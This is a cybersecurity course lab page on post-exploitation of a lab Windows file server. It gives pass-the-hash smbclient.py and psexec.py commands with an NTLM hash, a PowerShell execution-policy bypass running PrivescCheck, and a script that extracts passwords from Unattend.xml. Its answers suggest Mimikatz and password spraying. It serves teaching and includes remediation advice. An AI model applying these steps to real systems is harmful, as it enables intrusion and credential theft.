CAS Cybersecurity
Module 06


Last updated 3 years ago


Win Attack LAB: Situational Awareness on FS1

1. Introduction

We have now gained access to the host FS1.winattacklab.local with administrative privileges. This means that we no longer need to look for local privilege escalation methods. Instead, the goal is to find other valuable information that might help us compromise other users or hosts.

2. Acquiring the necessary tools

Compared to the Windows 10 client, none of our tools are installed on FS1 yet, so we need to prepare our setup first. For situational awareness we are going to use a tool called PrivescCheck.

First, we need to download it to our Linux attack host and then move it to FS1. On your Linux attack host, change to the tools directory:

cd /home/lab_admin/tools/

Then issue the following command to download all necessary resources as a ZIP archive:

curl -JLO https://github.com/itm4n/PrivescCheck/archive/refs/heads/master.zip

Next, we will move the ZIP archive to FS1 using smbclient.py as user aalfort:

smbclient.py -hashes :9859340265d3b3c1eb628ece70ebc238 winattacklab.local/aalfort@10.0.1.101

Switch to the C drive, upload the ZIP file and exit again:

use c$
put PrivescCheck-master.zip
exit

3. Unpacking and running PrivescCheck

Once the archive has been uploaded, we can connect to FS1 again via psexec.py (as previously in "Windows Attack Lab - Step 6 - Lateral Movement to FS1") and run the script.

Use the following command to establish the connection from your Linux attack host to FS1 as user aalfort:

psexec.py -hashes :9859340265d3b3c1eb628ece70ebc238 winattacklab.local/aalfort@10.0.1.101

You should now have a command prompt.

Now switch to the root of the C drive:

cd c:\

Next, unpack the archive:

tar -xf PrivescCheck-master.zip

cd PrivescCheck-master

Lastly, we can import and execute the script with one single command:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

You should see the following output, as the script begins to run:

WARNING: You are running this script as an administrator! Some checks will be automatically disabled.
WARNING: You can specify the '-Force' option to disable this warning message.
...

4. Analyzing the Results

After some time, PrivescCheck should complete and present you with the following output:

The lines marked with KO are of interest to us!

This indicates that a file used for an unattended installation was found; such files often contain credentials. If you scroll up a bit in the output, you should find the details for this finding:

As you can see above, PrivescCheck directly parsed the file and found the password Winter2019 for the user admin.
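The check PrivescCheck performs here can be reproduced as a small audit a defender runs before a deployed host goes into service. The following Python is an added example, not code from PrivescCheck or the lab: the answer file it parses is constructed (the admin/Winter2019 pair mirrors the finding above; the svc_deploy account and its password are invented), and it also handles the base64 "hidden" form of the password, which is an encoding rather than protection.

```python
"""Audit a Windows answer file (Unattend.xml) for leftover credentials. Added
example for this lab page (not PrivescCheck code); sample XML is constructed."""
import base64
import xml.etree.ElementTree as ET


def _local(tag):  # drop the urn:schemas-microsoft-com:unattend namespace
    return tag.rsplit("}", 1)[-1]


def decode_value(value, plaintext):
    """Return the clear password; the 'hidden' form is an encoding, not a cipher:
    base64 of UTF-16LE(password + "Password")."""
    if plaintext:
        return value
    try:
        raw = base64.b64decode(value, validate=True).decode("utf-16-le")
    except ValueError:
        return value  # not the encoded form after all: treat it as plaintext
    return raw.removesuffix("Password")


def find_credentials(xml_text):
    """List every account/password pair the answer file still carries."""
    root = ET.fromstring(xml_text)
    parent = {c: p for p in root.iter() for c in p}
    findings = []
    for elem in root.iter():
        if _local(elem.tag) not in ("Password", "AdministratorPassword"):
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in elem}
        if not fields.get("Value"):
            continue  # empty value: nothing leaked
        plaintext = fields.get("PlainText", "false").lower() == "true"
        names = {_local(c.tag): (c.text or "").strip() for c in parent[elem]}
        account = names.get("Name") or names.get("Username") or "Administrator"
        findings.append({"account": account,
                         "password": decode_value(fields["Value"], plaintext),
                         "stored_as": "plaintext" if plaintext else "base64 only"})
    return findings


# Constructed sample: the lab's plaintext local admin plus an AutoLogon
# password in the "hidden" base64 form, built here so the encoding is exact.
HIDDEN = base64.b64encode("Summer2019Password".encode("utf-16-le")).decode()
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <UserAccounts><LocalAccounts><LocalAccount><Name>admin</Name>
      <Password><Value>Winter2019</Value><PlainText>true</PlainText></Password>
    </LocalAccount></LocalAccounts></UserAccounts>
    <AutoLogon><Password><Value>{HIDDEN}</Value><PlainText>false</PlainText></Password>
      <Username>svc_deploy</Username></AutoLogon>
  </component></settings></unattend>"""
```

Running find_credentials over the files PrivescCheck looks at (for example C:\Windows\Panther\Unattend.xml) gives the same kind of finding as the screenshot above; an empty result is what a cleaned-up host should return.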

5. Security Questions

  1. What is the intended use of the file Unattend.xml?

  2. Why is a password in this file?

  3. What is your recommendation to fix the problem?

  4. What other technique could we apply in order to get even more credentials from FS1?

  5. What could we do next with the credentials gathered from Unattend.xml?

6. Answers

  1. This file was used for an unattended installation which adds a local user with username admin and password Winter2019.

  2. The XML file contains the actions which should be performed on the target system (FS1). First the file with the included username and password is distributed (copied to FS1) and then executed to create this user. So the file contains both the username and the associated password.

  3. Recommendations:

  • Cleanup of the files after the deployment (delete file).

  • Restrict access to answer files (access control lists or permissions on a file).

  • Hide passwords (only possible to a limited extent).

  • If it is e.g. a domain join, use accounts with lower privilege.

  4. Techniques:

  • credential dumping (Mimikatz)

  • check the user home directories (C:\Users) on FS1 (shows which users have logged in on FS1)

Check for further information with PowerSploit:

  • Autologon credentials in the registry

  • web.config strings

  • passwords in cached Group Policy Preferences files

  5. With the password found we can perform the following steps:

  • Password Spraying to get users with the same password

  • Log in on other systems with the gathered username and password (verify whether the same local admin exists on several systems)